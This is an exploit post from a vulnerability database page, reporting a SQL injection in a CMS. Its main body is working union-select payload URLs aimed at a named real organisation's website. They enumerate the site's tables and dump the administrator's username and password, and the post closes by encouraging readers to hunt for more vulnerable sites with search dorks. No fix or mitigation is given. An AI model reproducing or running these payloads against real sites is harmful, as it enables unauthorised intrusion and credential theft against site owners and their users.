Pro Web CMS Sql Injection Vulnerability

2016.08.13
ir N_H (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title : Pro Web CMS Sql Injection Vulnerability # Exploit Author : N_H # Date : 2016/08/13 # Tested on : MacOS , Windows , Ubuntu # Google Dork : No # Home Page : https://www.prowebghana.net # Web Server : Apache # Category : Web Application # Discovered by : N_H # Description : One Sql Injection Vulnerability Discovered on ProWeb CMS Websites by N_H. This vulnerability include all of websites of this United Kingdom CMS. Now thousands of websites in the world are on this content management system (CMS). # For example, one of the sites vulnerable to this bug we investigated ... -------------------------------------------------------------------------------------------------- Target : http://www.ghanawildlifesociety.org Vulnerable Location : http://www.ghanawildlifesociety.org/web.php?id=32 Columns Number : http://www.ghanawildlifesociety.org/web.php?id=32+order+by+3-- Tables of website : http://www.ghanawildlifesociety.org/web.php?id=32+union+select+group_concat%28Table_name%29,2,3+from+information_schema.tables+where+table_schema=database%28%29--+ User and Password of Administrator : http://www.ghanawildlifesociety.org/web.php?id=32+union+select+group_concat%280x3c62723e%20,name,0x3a,Pass%29,2,3+from+user--+ -------------------------------------------------------------------------------------------------- # Warning : You can finding more vulnerable websites of this CMS with your creative Google Dorks and other ways. # We are : Nobody


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top